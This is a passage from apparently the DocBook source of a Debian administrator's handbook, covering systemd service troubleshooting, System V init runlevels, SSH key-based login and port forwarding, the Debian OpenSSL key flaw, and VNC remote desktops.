+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </computeroutput><userinput>journalctl -u ssh.service
+</userinput><computeroutput>-- Logs begin at Tue 2015-03-31 17:29:27 CEST, end at Tue 2015-03-31 17:30:36 CEST. --
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Received SIGHUP; restarting.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:30:10 mirtuel sshd[1147]: Accepted password for roland from 192.168.1.129 port 38742 ssh2
+Mar 31 17:30:10 mirtuel sshd[1147]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+Mar 31 17:30:35 mirtuel sshd[1180]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1182]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1184]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1186]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1188]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </computeroutput><userinput>vi /etc/ssh/sshd_config
+</userinput><computeroutput># </computeroutput><userinput>systemctl start ssh.service
+</userinput><computeroutput># </computeroutput><userinput>systemctl status ssh.service
+</userinput><computeroutput>● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: active (running) since Tue 2015-03-31 17:31:09 CEST; 2s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+ Main PID: 1222 (sshd)
+   CGroup: /system.slice/ssh.service
+           └─1222 /usr/sbin/sshd -D
+# </computeroutput>
+</screen>
+
+<para>
+After checking the status of the service (failed), we went on to check
+the logs; they indicate an error in the configuration file.  After
+editing the configuration file and fixing the error, we restart the
+service, then verify that it is indeed running.</para>
+
+<sidebar><title><emphasis>GOING FURTHER</emphasis> Other types of unit files</title>
+
+<para>We have only described the most basic of systemd's capabilities in
+this section.  It offers many other interesting features; we will only
+list a few here:</para>
+
+<itemizedlist>
+
+<listitem><para>socket activation: a “socket” unit file can be used to
+describe a network or Unix socket managed by systemd; this means that
+the socket will be created by systemd, and the actual service may be
+started on demand when an actual connection attempt comes.  This
+roughly replicates the feature set of
+<command>inetd</command>. See
+<citerefentry><refentrytitle>systemd.socket</refentrytitle><manvolnum>5</manvolnum></citerefentry>.
+</para></listitem>
+
+<listitem><para>timers: a “timer” unit file describes events that
+occur with a fixed frequency or on specific times; when a service is linked to such a
+timer, the corresponding task will be executed whenever the timer
+fires. This allows replicating part of the
+<command>cron</command> features. See
+<citerefentry><refentrytitle>systemd.timer</refentrytitle><manvolnum>5</manvolnum></citerefentry>.
+</para></listitem>
+
+<listitem><para>network: a “network“ unit file describes a network
+interface, which allows configuring such interfaces as well as
+expressing that a service depends on one particular interface being
+up. </para></listitem>
+
+</itemizedlist>
+</sidebar>
+
+</section>
+
+<section id="sect.sysvinit"><title>The System V init system</title>
+    <para>The System V init system (which we'll call init for brevity)
+    executes several processes, following instructions from the
+    <filename>/etc/inittab</filename> file. The first program that is
+    executed (which corresponds to the <emphasis>sysinit</emphasis>
+    step) is <command>/etc/init.d/rcS</command>, a script that
+    executes all of the programs in the
+    <filename>/etc/rcS.d/</filename> directory.
+    <indexterm><primary><filename>/etc/init.d/rcS</filename></primary></indexterm>
+    <indexterm><primary><filename>rcS</filename></primary></indexterm>
+    <indexterm><primary><filename>/etc/init.d/rcS.d/</filename></primary></indexterm>
+    <indexterm><primary><filename>rcS.d</filename></primary></indexterm></para>
+
+    <para>Among these, you will find successively programs in charge
+    of:</para>
+    <itemizedlist>
+      <listitem>
+	<para>configuring the console's keyboard;</para>
+      </listitem>
+      <listitem>
+	<para>loading drivers: most of the kernel modules are loaded by the
+	kernel itself as the hardware is detected; extra drivers are then
+	loaded automatically when the corresponding modules are listed in
+	<filename>/etc/modules</filename>;</para>
+      </listitem>
+      <listitem>
+	<para>checking the integrity of filesystems;</para>
+      </listitem>
+      <listitem>
+	<para>mounting local partitions;</para>
+      </listitem>
+      <listitem>
+	<para>configuring the network;</para>
+      </listitem>
+      <listitem>
+	<para>mounting network filesystems (NFS).</para>
+      </listitem>
+    </itemizedlist>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Kernel modules and options</title>
+      <indexterm><primary>modules</primary><secondary>kernel modules</secondary></indexterm>
+
+      <para>Kernel modules also have options that can be configured by
+      putting some files in <filename>/etc/modprobe.d/</filename>. These
+      options are defined with directives like this: <literal>options
+      <replaceable>module-name</replaceable>
+      <replaceable>option-name</replaceable>=<replaceable>option-value</replaceable></literal>.
+      Several options can be specified with a single directive if
+      necessary.</para>
+
+      <para>These configuration files are intended for
+      <command>modprobe</command> — the program that loads a kernel
+      module with its dependencies (modules can indeed call other modules).
+      This program is provided by the <emphasis role="pkg">kmod</emphasis> package.</para>
+      <indexterm><primary><command>modprobe</command></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">kmod</emphasis></primary></indexterm>
+    </sidebar>
+
+    <para>After this stage, <command>init</command> takes over and starts
+    the programs enabled in the default runlevel (which is usually runlevel
+    2). It executes <command>/etc/init.d/rc 2</command>, a script that
+    starts all services which are listed in
+    <filename>/etc/rc2.d/</filename> and whose names start with the “S”
+    letter. The two-figures number that follows had historically been used
+    to define the order in which services had to be started, but nowadays
+    the default boot system uses <command>insserv</command>, which schedules
+    everything automatically
+    based on the scripts' dependencies. Each boot script thus declares the
+    conditions that must be met to start or stop the service (for example,
+    if it must start before or after another service);
+    <command>init</command> then launches them in the order that meets
+    these conditions. The static numbering of scripts is therefore no
+    longer taken into consideration (but they must always have a name
+    beginning with “S” followed by two digits and the actual name
+    of the script used for the dependencies). Generally, base services
+    (such as logging with <command>rsyslog</command>, or port assignment
+    with <command>portmap</command>) are started first, followed by
+    standard services and the graphical interface
+    (<command>gdm3</command>).</para>
+
+    <para>This dependency-based boot system makes it possible to automate
+    re-numbering, which could be rather tedious if it had to be done
+    manually, and it limits the risks of human error, since scheduling is
+    conducted according to the parameters that are indicated. Another
+    benefit is that services can be started in parallel when they are
+    independent from one another, which can accelerate the boot
+    process.</para>
+
+    <indexterm><primary>runlevel</primary></indexterm>
+    <indexterm><primary>level, runlevel</primary></indexterm>
+
+    <para><command>init</command> distinguishes several runlevels, so it
+    can switch from one to another with the <command>telinit
+    <replaceable>new-level</replaceable></command> command. Immediately,
+    <command>init</command> executes <command>/etc/init.d/rc</command>
+    again with the new runlevel. This script will then start the missing
+    services and stop those that are no longer desired. To do this, it
+    refers to the content of the
+    <filename>/etc/rc<replaceable>X</replaceable>.d</filename> (where
+    <replaceable>X</replaceable> represents the new runlevel). Scripts
+    starting with “S” (as in “Start”) are services to be started;
+    those starting with “K” (as in “Kill”) are the services to be
+    stopped. The script does not start any service that was already active
+    in the previous runlevel.</para>
+
+    <para>By default, System V init in Debian uses four different
+    runlevels:</para>
+    <itemizedlist>
+      <listitem>
+	<para>Level 0 is only used temporarily, while the computer is
+	powering down. As such, it only contains many “K”
+	scripts.</para>
+      </listitem>
+      <listitem>
+	<para>Level 1, also known as single-user mode, corresponds to the
+	system in degraded mode; it includes only basic services, and is
+	intended for maintenance operations where interactions with
+	ordinary users are not desired.</para>
+      </listitem>
+      <listitem>
+	<para>Level 2 is the level for normal operation, which includes
+	networking services, a graphical interface, user logins,
+	etc.</para>
+      </listitem>
+      <listitem>
+	<para>Level 6 is similar to level 0, except that it is used during
+	the shutdown phase that precedes a reboot.</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>Other levels exist, especially 3 to 5. By default they are
+    configured to operate the same way as level 2, but the administrator
+    can modify them (by adding or deleting scripts in the corresponding
+    <filename>/etc/rc<replaceable>X</replaceable>.d</filename> directories)
+    to adapt them to particular needs.</para>
+
+    <figure id="figure.boot-process-sysvinit">
+      <title>Boot sequence of a computer running Linux with System V init</title>
+      <mediaobject>
+        <imageobject>
+          <imagedata fileref="images/startup-sysvinit.png" scalefit="1" width="80%" />
+        </imageobject>
+      </mediaobject>
+    </figure>
+    <indexterm><primary>initialization script</primary></indexterm>
+
+    <para>All the scripts contained in the various
+    <filename>/etc/rc<replaceable>X</replaceable>.d</filename> directories
+    are really only symbolic links — created upon package installation by
+    the <command>update-rc.d</command> program — pointing to the actual
+    scripts which are stored in <filename>/etc/init.d/</filename>. The
+    administrator can fine tune the services available in each runlevel by
+    re-running <command>update-rc.d</command> with adjusted parameters. The
+    <citerefentry><refentrytitle>update-rc.d</refentrytitle><manvolnum>1</manvolnum></citerefentry>
+    manual page describes the syntax in detail. Please note that removing
+    all symbolic links (with the <literal>remove</literal> parameter) is
+    not a good method to disable a service. Instead you should simply
+    configure it to not start in the desired runlevel (while preserving the
+    corresponding calls to stop it in the event that the service runs in
+    the previous runlevel). Since <command>update-rc.d</command> has a
+    somewhat convoluted interface, you may prefer using
+    <command>rcconf</command> (from the <emphasis role="pkg">rcconf</emphasis> package) which provides a more
+    user-friendly interface.</para>
+    <indexterm><primary><command>update-rc.d</command></primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>DEBIAN POLICY</emphasis> Restarting services</title>
+      <indexterm><primary><command>invoke-rc.d</command></primary></indexterm>
+      <indexterm><primary>service</primary><secondary>restart</secondary></indexterm>
+      <indexterm><primary>restarting services</primary></indexterm>
+
+      <para>The maintainer scripts for Debian packages will sometimes
+      restart certain services to ensure their availability or get them to
+      take certain options into account. The command that controls a
+      service — <command>service <replaceable>service</replaceable>
+      <replaceable>operation</replaceable></command> — doesn't take
+      runlevel into consideration, assumes (wrongly) that the service is
+      currently being used, and may thus initiate incorrect operations
+      (starting a service that was deliberately stopped, or stopping a
+      service that is already stopped, etc.). Debian therefore introduced
+      the <command>invoke-rc.d</command> program: this program must be used
+      by maintainer scripts to run services initialization scripts and it
+      will only execute the necessary commands. Note that, contrary to
+      common usage, the <filename>.d</filename> suffix is used here in a
+      program name, and not in a directory.</para>
+    </sidebar>
+
+    <para>Finally, <command>init</command> starts control programs for
+    various virtual consoles (<command>getty</command>). It displays a
+    prompt, waiting for a username, then executes <command>login
+    <replaceable>user</replaceable></command> to initiate a session.</para>
+    <indexterm><primary><command>getty</command></primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>VOCABULARY</emphasis> Console and terminal</title>
+
+      <para>The first computers were usually separated into several, very
+      large parts: the storage enclosure and the central processing unit
+      were separate from the peripheral devices used by the operators to
+      control them. These were part of a separate furniture, the
+      “console”. This term was retained, but its meaning has changed.
+      It has become more or less synonymous with “terminal”, being a
+      keyboard and a screen.</para>
+
+      <para>With the development of computers, operating systems have
+      offered several virtual consoles to allow for several independent
+      sessions at the same time, even if there is only one keyboard and
+      screen. Most GNU/Linux systems offer six virtual consoles (in text
+      mode), accessible by typing the key combinations <keycombo action="simul"> <keycap>Control</keycap> <keycap>Alt</keycap>
+      <keycap>F1</keycap> </keycombo> through <keycombo action="simul">
+      <keycap>Control</keycap> <keycap>Alt</keycap> <keycap>F6</keycap>
+      </keycombo>.</para>
+
+      <para>By extension, the terms “console” and “terminal” can
+      also refer to a terminal emulator in a graphical X11 session (such as
+      <command>xterm</command>, <command>gnome-terminal</command> or
+      <command>konsole</command>).</para>
+    </sidebar>
+</section>
+  </section>
+  <section id="sect.remote-login">
+    <title>Remote Login</title>
+
+    <para>It is essential for an administrator to be able to connect to a
+    computer remotely. Servers, confined in their own room, are rarely
+    equipped with permanent keyboards and monitors — but they are
+    connected to the network.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Client, server</title>
+      <indexterm><primary>client</primary><secondary>client/server architecture</secondary></indexterm>
+      <indexterm><primary>server</primary><secondary>client/server architecture</secondary></indexterm>
+
+      <para>A system where several processes communicate with each other is
+      often described with the “client/server” metaphor. The server is
+      the program that takes requests coming from a client and executes
+      them. It is the client that controls operations, the server doesn't
+      take any initiative of its own.</para>
+    </sidebar>
+
+    <indexterm><primary>login</primary><secondary>remote login</secondary></indexterm>
+    <indexterm><primary>remote login</primary></indexterm>
+
+    <section id="sect.ssh">
+      <title>Secure Remote Login: SSH</title>
+      <indexterm><primary>SSH</primary></indexterm>
+      <indexterm><primary>Secure Shell</primary></indexterm>
+
+      <para>The <emphasis>SSH</emphasis> (Secure SHell) protocol was designed
+      with security and reliability in mind. Connections using SSH are
+      secure: the partner is authenticated and all data exchanges are
+      encrypted.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> Telnet and RSH are obsolete</title>
+	<indexterm><primary><command>telnet</command></primary></indexterm>
+	<indexterm><primary><command>rsh</command></primary></indexterm>
+
+	<para>Before SSH, <emphasis>Telnet</emphasis> and
+	<emphasis>RSH</emphasis> were the main tools used to login
+	remotely. They are now largely obsolete and should no longer be
+	used even if Debian still provides them.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> Authentication, encryption</title>
+
+	<para>When you need to give a client the ability to conduct or
+	trigger actions on a server, security is important. You must ensure
+	the identity of the client; this is authentication. This identity
+	usually consists of a password that must be kept secret, or any
+	other client could get the password. This is the purpose of
+	encryption, which is a form of encoding that allows two systems to
+	communicate confidential information on a public channel while
+	protecting it from being readable to others.</para>
+
+	<para>Authentication and encryption are often mentioned together,
+	both because they are frequently used together, and because they
+	are usually implemented with similar mathematical concepts.</para>
+      </sidebar>
+
+      <para>SSH also offers two file transfer services.
+      <command>scp</command> is a command line tool that can be used like
+      <command>cp</command>, except that any path to another machine is
+      prefixed with the machine's name, followed by a colon.</para>
+
+      <screen><computeroutput>$ </computeroutput><userinput>scp file machine:/tmp/</userinput>
+</screen>
+
+      <para><command>sftp</command> is an interactive command, similar to
+      <command>ftp</command>. In a single session, <command>sftp</command>
+      can transfer several files, and it is possible to manipulate remote
+      files with it (delete, rename, change permissions, etc.).</para>
+      <indexterm><primary><command>scp</command></primary></indexterm>
+      <indexterm><primary><command>sftp</command></primary></indexterm>
+
+      <para>Debian uses OpenSSH, a free version of SSH maintained by the
+      <command>OpenBSD</command> project (a free operating system based on
+      the BSD kernel, focused on security) and fork of the original SSH
+      software developed by the SSH Communications Security Corp company,
+      of Finland. This company initially developed SSH as free software,
+      but eventually decided to continue its development under a
+      proprietary license. The OpenBSD project then created OpenSSH to
+      maintain a free version of SSH.</para>
+      <indexterm><primary>OpenSSH</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> <foreignphrase>Fork</foreignphrase></title>
+        <indexterm><primary>fork</primary></indexterm>
+
+	<para>A “fork”, in the software field, means a new project that
+	starts as a clone of an existing project, and that will compete
+	with it. From there on, both software will usually quickly diverge
+	in terms of new developments. A fork is often the result of
+	disagreements within the development team.</para>
+
+	<para>The option to fork a project is a direct result of the very
+	nature of free software; a fork is a healthy event when it enables
+	the continuation of a project as free software (for example in case
+	of license changes). A fork arising from technical or personal
+	disagreements is often a waste of human resources; another
+	resolution would be preferable. Mergers of two projects that
+	previously went through a prior fork are not unheard of.</para>
+      </sidebar>
+
+      <para>OpenSSH is split into two packages: the client part is in the <emphasis role="pkg">openssh-client</emphasis> package, and the server is in
+      the <emphasis role="pkg">openssh-server</emphasis> package. The
+      <emphasis role="pkg">ssh</emphasis> meta-package depends on both
+      parts and facilitates installation of both (<command>apt install
+      ssh</command>).</para>
+
+      <section id="sect.ssh-key-based-auth">
+        <title>Key-Based Authentication</title>
+
+	<para>Each time someone logs in over SSH, the remote server asks
+	for a password to authenticate the user. This can be problematic if
+	you want to automate a connection, or if you use a tool that
+	requires frequent connections over SSH. This is why SSH offers a
+	key-based authentication system.</para>
+
+	<para>The user generates a key pair on the client machine with
+	<command>ssh-keygen -t rsa</command>; the public key is stored in
+	<filename>~/.ssh/id_rsa.pub</filename>, while the corresponding
+	private key is stored in <filename>~/.ssh/id_rsa</filename>. The
+	user then uses <command>ssh-copy-id
+	<replaceable>server</replaceable></command> to add their public key
+	to the <filename>~/.ssh/authorized_keys</filename> file on the
+	server. If the private key was not protected with a
+	“passphrase” at the time of its creation, all subsequent logins
+	on the server will work without a password. Otherwise, the private
+	key must be decrypted each time by entering the passphrase.
+	Fortunately, <command>ssh-agent</command> allows us to keep private
+	keys in memory to not have to regularly re-enter the password. For
+	this, you simply use <command>ssh-add</command> (once per work
+	session) provided that the session is already associated with a
+	functional instance of <command>ssh-agent</command>. Debian
+	activates it by default in graphical sessions, but this can be
+	deactivated by changing
+	<filename>/etc/X11/Xsession.options</filename>. For a console
+	session, you can manually start it with <command>eval
+	$(ssh-agent)</command>.</para>
+
+        <sidebar>
+          <title><emphasis>SECURITY</emphasis> Protection of the private key</title>
+
+	  <para>Whoever has the private key can login on the account thus
+	  configured. This is why access to the private key is protected by
+	  a “passphrase”. Someone who acquires a copy of a private key
+	  file (for example, <filename>~/.ssh/id_rsa</filename>) still has
+	  to know this phrase in order to be able to use it. This
+	  additional protection is not, however, impregnable, and if you
+	  think that this file has been compromised, it is best to disable
+	  that key on the computers in which it has been installed (by
+	  removing it from the <filename>authorized_keys</filename> files)
+	  and replacing it with a newly generated key.</para>
+        </sidebar>
+
+        <sidebar>
+          <title><emphasis>CULTURE</emphasis> OpenSSL flaw in Debian <emphasis role="distribution">Etch</emphasis></title>
+
+	  <para>The OpenSSL library, as initially provided in Debian
+	  <emphasis role="distribution">Etch</emphasis>, had a serious
+	  problem in its random number generator (RNG). Indeed, the Debian
+	  maintainer had made a change so that applications using it
+	  would no longer generate warnings when analyzed by memory testing
+	  tools like <command>valgrind</command>. Unfortunately, this change also
+	  meant that the RNG was employing only one source of entropy
+	  corresponding to the process number (PID) whose 32,000 possible
+	  values do not offer enough randomness. <ulink type="block" url="http://www.debian.org/security/2008/dsa-1571" /></para>
+
+	  <para>Specifically, whenever OpenSSL was used to generate a key,
+	  it always produced a key within a known set of hundreds of
+	  thousands of keys (32,000 multiplied by a small number of key
+	  lengths). This affected SSH keys, SSL keys, and X.509
+	  certificates used by numerous applications, such as OpenVPN. A
+	  cracker had only to try all of the keys to gain unauthorized
+	  access. To reduce the impact of the problem, the SSH daemon was
+	  modified to refuse problematic keys that are listed in the
+	  <emphasis role="pkg">openssh-blacklist</emphasis> and <emphasis role="pkg">openssh-blacklist-extra</emphasis> packages.
+	  Additionally, the <command>ssh-vulnkey</command> command allows
+	  identification of possibly compromised keys in the system.</para>
+
+	  <para>A more thorough analysis of this incident brings to
+	  light that it is the result of multiple (small) problems,
+	  both within the OpenSSL project and with the Debian package
+	  maintainer. A widely used library like OpenSSL should —
+	  without modifications — not generate warnings when tested by
+	  <command>valgrind</command>. Furthermore, the code
+	  (especially the parts as sensitive as the RNG) should be
+	  better commented to prevent such errors. On Debian's side,
+	  the maintainer wanted to validate the modifications with the
+	  OpenSSL developers, but simply explained the modifications
+	  without providing the corresponding patch to review and
+	  failed to mention his role within Debian. Finally, the
+	  maintenance choices were sub-optimal: the changes made to
+	  the original code were not clearly documented; all the
+	  modifications were effectively stored in a Subversion
+	  repository, but they ended up all lumped into one single
+	  patch during creation of the source package.</para>
+
+	  <para>It is difficult under such conditions to find the
+	  corrective measures to prevent such incidents from recurring. The
+	  lesson to be learned here is that every divergence Debian
+	  introduces to upstream software must be justified, documented,
+	  submitted to the upstream project when possible, and widely
+	  publicized. It is from this perspective that the new source
+          package format (“3.0 (quilt)”) and the Debian sources webservice
+          were developed.
+	  <ulink type="block" url="http://sources.debian.org" /></para>
+        </sidebar>
+      </section>
+      <section id="sect.ssh-x11">
+        <title>Using Remote X11 Applications</title>
+
+	<para>The SSH protocol allows forwarding of graphical data
+	(“X11” session, from the name of the most widespread graphical
+	system in Unix); the server then keeps a dedicated channel for
+	those data. Specifically, a graphical program executed remotely can
+	be displayed on the X.org server of the local screen, and the whole
+	session (input and display) will be secure. Since this feature
+	allows remote applications to interfere with the local system, it
+	is disabled by default. You can enable it by specifying
+	<literal>X11Forwarding yes</literal> in the server configuration
+	file (<filename>/etc/ssh/sshd_config</filename>). Finally, the user
+	must also request it by adding the <literal>-X</literal> option to
+	the <command>ssh</command> command-line.</para>
+      </section>
+      <section id="sect.ssh-port-forwarding">
+        <title>Creating Encrypted Tunnels with Port Forwarding</title>
+        <indexterm><primary>port forwarding</primary></indexterm>
+
+	<para>Its <literal>-R</literal> and <literal>-L</literal> options
+	allow <command>ssh</command> to create “encrypted tunnels”
+	between two machines, securely forwarding a local TCP port (see
+	sidebar <xref linkend="sidebar.tcp-udp" />) to a remote machine or
+	vice versa.</para>
+
+        <sidebar>
+          <title><emphasis>VOCABULARY</emphasis> Tunnel</title>
+          <indexterm><primary>tunnel (SSH)</primary><seealso>VPN</seealso></indexterm>
+          <indexterm><primary>SSH tunnel</primary><seealso>VPN</seealso></indexterm>
+
+	  <para>The Internet, and most LANs that are connected to it,
+	  operate in packet mode and not in connected mode, meaning that a
+	  packet issued from one computer to another is going to be stopped
+	  at several intermediary routers to find its way to its
+	  destination. You can still simulate a connected operation where
+	  the stream is encapsulated in normal IP packets. These packets
+	  follow their usual route, but the stream is reconstructed
+	  unchanged at the destination. We call this a “tunnel”,
+	  analogous to a road tunnel in which vehicles drive directly from
+	  the entrance (input) to the exit (output) without encountering
+	  any intersections, as opposed to a path on the surface that would
+	  involve intersections and changing direction.</para>
+
+	  <para>You can use this opportunity to add encryption to the
+	  tunnel: the stream that flows through it is then unrecognizable
+	  from the outside, but it is returned in decrypted form at the
+	  exit of the tunnel.</para>
+        </sidebar>
+
+	<para><command>ssh -L 8000:server:25 intermediary</command>
+	establishes an SSH session with the
+	<replaceable>intermediary</replaceable> host and listens to local
+	port 8000 (see <xref linkend="figure.ssh-L" />). For any connection
+	established on this port, <command>ssh</command> will initiate a
+	connection from the <replaceable>intermediary</replaceable>
+	computer to port 25 on the <replaceable>server</replaceable>, and
+	will bind both connections together.</para>
+
+	<para><command>ssh -R 8000:server:25 intermediary</command> also
+	establishes an SSH session to the
+	<replaceable>intermediary</replaceable> computer, but it is on this
+	machine that <command>ssh</command> listens to port 8000 (see <xref linkend="figure.ssh-R" />). Any connection established on this port
+	will cause <command>ssh</command> to open a connection from the
+	local machine on to port 25 of the
+	<replaceable>server</replaceable>, and to bind both connections
+	together.</para>
+
+	<para>In both cases, connections are made to port 25 on the
+	<replaceable>server</replaceable> host, which pass through the SSH
+	tunnel established between the local machine and the
+	<replaceable>intermediary</replaceable> machine. In the first case,
+	the entrance to the tunnel is local port 8000, and the data move
+	towards the <replaceable>intermediary</replaceable> machine before
+	being directed to the <replaceable>server</replaceable> on the
+	“public” network. In the second case, the input and output in
+	the tunnel are reversed; the entrance is port 8000 on the
+	<replaceable>intermediary</replaceable> machine, the output is on
+	the local host, and the data are then directed to the
+	<replaceable>server</replaceable>. In practice, the server is
+	usually either the local machine or the intermediary. That way SSH
+	secures the connection from one end to the other.</para>
+
+        <figure id="figure.ssh-L">
+          <title>Forwarding a local port with SSH</title>
+          <mediaobject>
+            <imageobject>
+              <imagedata fileref="images/ssh-L.png" width="35%" />
+            </imageobject>
+          </mediaobject>
+        </figure>
+
+        <figure id="figure.ssh-R">
+          <title>Forwarding a remote port with SSH</title>
+          <mediaobject>
+            <imageobject>
+              <imagedata fileref="images/ssh-R.png" width="35%" />
+            </imageobject>
+          </mediaobject>
+        </figure>
+      </section>
+    </section>
+    <section id="sect.remote-desktops">
+      <title>Using Remote Graphical Desktops</title>
+
+      <para>VNC (Virtual Network Computing) allows remote access to
+      graphical desktops.</para>
+      <indexterm><primary>VNC</primary></indexterm>
+      <indexterm><primary>Virtual Network Computing</primary></indexterm>
+      <indexterm><primary>graphical desktop</primary><secondary>remote</secondary></indexterm>
+      <indexterm><primary>remote graphical desktop</primary></indexterm>
+      <indexterm><primary>desktop, remote graphical desktop</primary></indexterm>
+
+      <para>This tool is mostly used for technical assistance; the
+      administrator can see the errors that the user is facing, and show
+      them the correct course of action without having to stand by
+      them.</para>
+      <indexterm><primary><emphasis role="pkg">vino</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">krfb</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">x11vnc</emphasis></primary></indexterm>
+
+      <para>First, the user must authorize sharing their session.  The
+      GNOME graphical desktop environment in <emphasis role="distribution">Jessie</emphasis> includes that option in
+      its configuration panel (contrary to previous versions of
+      Debian, where the user had to install and run
+      <command>vino</command>).  KDE Plasma still requires using
+      <command>krfb</command> to allow sharing an existing session
+      over VNC. For other graphical desktop environments, the
+      <command>x11vnc</command> command (from the Debian package of
+      the same name) serves the same purpose; you can make it
+      available to the user with an explicit icon.</para>
+
+      <indexterm><primary><emphasis role="pkg">vinagre</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">tsclient</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">krdc</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">xvnc4viewer</emphasis></primary></indexterm>
+
+      <para>When the graphical session is made available by VNC, the
+      administrator must connect to it with a VNC client. GNOME has
+      <command>vinagre</command> and <command>remmina</command> for that,
+      while the KDE project provides <command>krdc</command> (in the menu at
+      <menuchoice> <guimenu>K</guimenu> <guisubmenu>Internet</guisubmenu>
+      <guimenuitem>Remote Desktop Client</guimenuitem></menuchoice>). There
+      are other VNC clients that use the command line, such as
+      <command>xvnc4viewer</command> in the Debian package of the same
+      name. Once connected, the administrator can see what is going on, work
+      on the machine remotely, and show the user how to proceed.</para>
+
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> VNC over SSH</title>
+        <indexterm><primary>SSH tunnel</primary><secondary>VNC</secondary></indexterm>
+
+	<para>If you want to connect by VNC, and you don't want your data
+	sent in clear text on the network, it is possible to encapsulate
+	the data in an SSH tunnel (see <xref linkend="sect.ssh-port-forwarding" />). You simply have to know
+	that VNC uses port 5900 by default for the first screen (called
+	“localhost:0”), 5901 for the second (called “localhost:1”),
+	etc.</para>
+
+	<para>The <command>ssh -L localhost:5901:localhost:5900 -N -T
+	<replaceable>machine</replaceable></command> command creates a
+	tunnel between local port 5901 in the localhost interface and port
+	5900 of the <replaceable>machine</replaceable> host. The first
+	“localhost” restricts SSH to listening to only that interface
+	on the local machine. The second “localhost” indicates the
+	interface on the remote machine which will receive the network
+	traffic entering in “localhost:5901”. Thus <command>vncviewer
+	localhost:1</command> will connect the VNC client to the remote
+	screen, even though you indicate the name of the local
+	machine.</para>
+
+	<para>When the VNC session is closed, remember to close the tunnel
+	by also quitting the corresponding SSH session.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Display manager</title>
+        <indexterm><primary><command>gdm3</command></primary></indexterm>
+        <indexterm><primary><command>kdm</command></primary></indexterm>
+        <indexterm><primary><command>xdm</command></primary></indexterm>
+        <indexterm><primary><command>lightdm</command></primary></indexterm>
+        <indexterm><primary>manager</primary><secondary>display manager</secondary></indexterm>
+        <indexterm><primary>display manager</primary></indexterm>
+
+	<para><command>gdm3</command>, <command>kdm</command>, <command>lightdm</command>, and
+	<command>xdm</command> are Display Managers. They take control of
+	the graphical interface shortly after boot in order to provide the
+	user a login screen. Once the user has logged in, they execute the
+	programs needed to start a graphical work session.</para>
+      </sidebar>
+
+      <para>VNC also works for mobile users, or company executives, who
+      occasionally need to login from their home to access a remote desktop
+      similar to the one they use at work. The configuration of such a
+      service is more complicated: you first install the <emphasis role="pkg">vnc4server</emphasis> package, change the configuration of
+      the display manager to accept <literal>XDMCP Query</literal> requests
+      (for <command>gdm3</command>, this can be done by adding
+      <literal>Enable=true</literal> in the “xdmcp” section of
+      <filename>/etc/gdm3/daemon.conf</filename>), and finally, start
+      the VNC server with <command>inetd</command> so that a session is
+      automatically started when a user tries to login. For example, you
+      may add this line to <filename>/etc/inetd.conf</filename>:</para>
+
+      <programlisting>5950  stream  tcp  nowait  nobody.tty  /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 1024x768 -depth 16 securitytypes=none
+</programlisting>
+
+      <para>Redirecting incoming connections to the display manager solves
+      the problem of authentication, because only users with local accounts
+      will pass the <command>gdm3</command> login screen (or equivalent
+      <command>kdm</command>, <command>xdm</command>, etc.). As this
+      operation allows multiple simultaneous logins without any problem
+      (provided the server is powerful enough), it can even be used to
